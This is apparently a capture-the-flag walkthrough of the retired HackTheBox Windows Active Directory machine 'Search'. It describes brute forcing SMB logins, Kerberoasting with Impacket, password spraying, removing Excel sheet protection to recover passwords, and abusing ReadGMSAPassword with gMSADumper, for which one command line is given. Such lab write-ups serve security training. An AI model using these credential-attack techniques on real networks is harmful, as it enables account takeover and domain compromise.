Search machine is a vulnerable machine belonging to the Windows operating system among retired machines. It is expected to obtain user and root flags using these vulnerabilities.
We perform a network scan with nmap to recognize the target machine.
Classic Scan

Full Port Scan

As a result of the port scan, we detected the AD machine and the search.htb domain. We saved the domain in the /etc/hosts file and provided enumeration on the ports.
We enumerated 53 DNS, 135 RPC, 389 ldap, 445 SMB ports and did not get any information. (We detected http://research.search.htb/, http://portal.search.htb/ and they give the same information as port 80)
I am providing enumeration over port 80/443.

We looked from developer mode, we looked from web analyzer and source code, we did a directory scan with gobuster and did not find anything.
We detected the password from the web interface.

Looking closely, we can read the text below (explaining potential credentials):
Send password to Hope Sharp
Here it says to send a password to the Hope Sharp user, first we list the possible usernames

We have listed the possible users.

We identify user information from “Our Team” on the web.
Keely Lyons
Dax Santiago
Sierra Frye
Kyla Stewart
Kaiara Spencer
Dave Simpson
Ben Thompson
Chris Stewart
I’m getting it.
Then I try to detect the Hope Sharp user who may have credential information by brute force.
I apply it with crackmap smb.

I detect Credential information.
Using this information, I provided smb enumeration, accessed the desktop of hope.sharp user, enumerated all files and directories, but I could not get any information.

I am providing Ldap enumeration by providing this credential information

I couldn’t get it here.
I am trying to get the information from ldap using the ldapdump tool

We have received the information here, now let’s try to get information on AD with bloodhound

I upload the generated files to bloodhounda,

Looking at the data, Hope.sharp does not have access to anything interesting.
In the Anlaysis section we see two users when we say “List all Kerberoastable Accounts”

Here I will provide a kreberosting attack.
I will need the credentials for Hope.sharp and I will use the GetUserSPNs.py script in Impacket which returns a hash value for the .web_svc account:

I’m trying to break this hash value with john.

We got his password.
We are looking at bloodhound on the web_svc user, there is no data.
I could not get any data from smb access again.
I am doing password spray in case this password may have been used from domain users.

We have detected the credential information.
Let’s provide smb connection here. (I couldn’t find user flag but I found Phishing_Attempt.xlsx file)

I’m analyzing the Phishing_Attempt file.

Notice that column c is hidden and cannot be opened in any way.
We can parse encrypted protected Office files with unzip and check the contents.

After unzip we checked all files
In xl/worksheets/sheet2.xml we found data hashed with sh512 and it contains usernames.

After a little more analysis, we find the passwords in file:///home/ma/Desktop/Search/xl/sharedStrings.xml.

We found the passwords here
Another solution is to remove the tag that encrypts the shhet in the files we unzip, then zip again.
2nd way

Removing Sheetprotection
And I can save and read the file.
Now I am trying to detect user credetial information by applying brute force to the user and passowrd list I obtained

We detected the credential information and enumerated it with smb. We obtained the user flag

We have the user flag.
There is no change in the information, so we are analyzing again through bloond hound
We focus on the user SIERRA.FRYE

Our user SIERRA.FRYE belongs to the BIRMINGHAM-ITSEC group and our BIRMINGHAM-ITSEC group belongs to the ITSEC group. The ITSEC group also has the “ReadGMSAPassword” vulnerability on the BIR-ADFS-GMSA group
Let’s use ReadGMSAPassword

Group Managed Service Accounts is a special Active Directory object that manages the password of active directory objects and changes it automatically at a certain interval (check the MSDS-ManagedPasswordInternal property).
The intended use of GMSA is to allow specific computer accounts to obtain the GMSA password and then run local services as GMSA. An attacker under the control of an authorized principal could abuse this privilege to impersonate GMSA.

It is possible if the GMSA is currently logged into a computer. this is the intended behavior for the GMSA. If the GMSA is logged on to a computer account that has been given the ability to retrieve the GMSA’s password, we only need to steal tokens or process injection in the process running as GMSA.
If the GMSA is not logged on to the computer, we can create a set of scheduled tasks or services to run as GMSA. The computer account, scheduled or service will start as GMSA and then the GMSA login can be abused in the same way as a standard user running processes on the machine.
Finally we can use gMSADumper.py to get the NT hash value of this.
gMSADumper.py -u ‘user’ -p ‘password’ -d ‘domain.local’

with the hash obtained here we can perform the technique using pass-the-hash, overpass-the-hash, or any hash

Here we have obtained the hash we have obtained this hash that we have targeted using rpc
We’ll restrict the user’s password.

Here we cannot connect with evilwinrm, we are connecting smbclient.

This is how we were able to get the root flag.